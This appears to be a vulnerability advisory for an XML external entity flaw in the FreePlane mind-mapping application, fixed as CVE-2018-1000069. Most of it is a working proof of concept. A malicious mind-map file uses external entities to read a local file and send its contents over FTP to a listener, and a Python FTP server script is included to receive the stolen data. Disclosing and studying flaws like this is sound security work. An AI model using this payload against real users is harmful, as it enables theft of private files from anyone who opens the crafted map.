What FreePlane is? FreePlane is an open-source application intended for creating mind maps.
Vulnerability descripton: FreePlane is a Java-based app that loads its mind maps that are stored as simple XML files. The parser allowed to expand external entities that caused this vulnerability.
Results: When the victim opens a maliciously crafted mind map, any accessible by Java file can be sent to the attacker.
Proof of concept: Malicious mindmap:
<map version="freeplane 1.5.9">
<!DOCTYPE node [
<!ENTITY % start "<![CDATA[">
<!ENTITY % data SYSTEM "file:////path/secret_file.txt">
<!ENTITY % end "]]>">
<!ENTITY % all "%start;%data;%end;">
<!ENTITY % c "<!ENTITY send SYSTEM 'ftp://127.0.0.1:2121/%all;'>">
%c;
]>
<!--To view this file, download free mind mapping software Freeplane from http://freeplane.sourceforge.net -->
<node TEXT="FreePlane PWNED" FOLDED="false" ID="ID_1702614147" CREATED="1488125426040" MODIFIED="1488125446531" STYLE="oval">
<node TEXT="Test" ID="ID_190033427" CREATED="1488125470150" MODIFIED="1488125471280"/>
<node TEXT="Test" ID="ID_935990512" CREATED="1488125471478" MODIFIED="1488125473816"/>
</node>
<node>&send;</node>
</map>
Simple FTP server:
#!/usr/env/python
from __future__ import print_function
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1',2121))
s.listen(1)
print('XXE-FTP listening')
conn,addr = s.accept()
conn.sendall('220 Staal XXE-FTP\r\n'.encode())
stop = False
while not stop:
dp = str(conn.recv(1024))
if dp.find("USER") > -1:
conn.sendall("331 password please - version check\r\n".encode())
else:
conn.sendall("230 more data please!\r\n".encode())
if dp.find("RETR")==0 or dp.find("QUIT")==0:
stop = True
if dp.find("CWD") > -1:
print(dp.replace('CWD ','/',1).replace('\r\n',''),end='')
if dp.find("RETR") > -1:
print(dp.replace("RETR", '\033[92m[*] RECEIVED DATA\033[0m\r\n', 1))
conn.close()
s.close()
Status
Fixed - CVE-2018-1000069
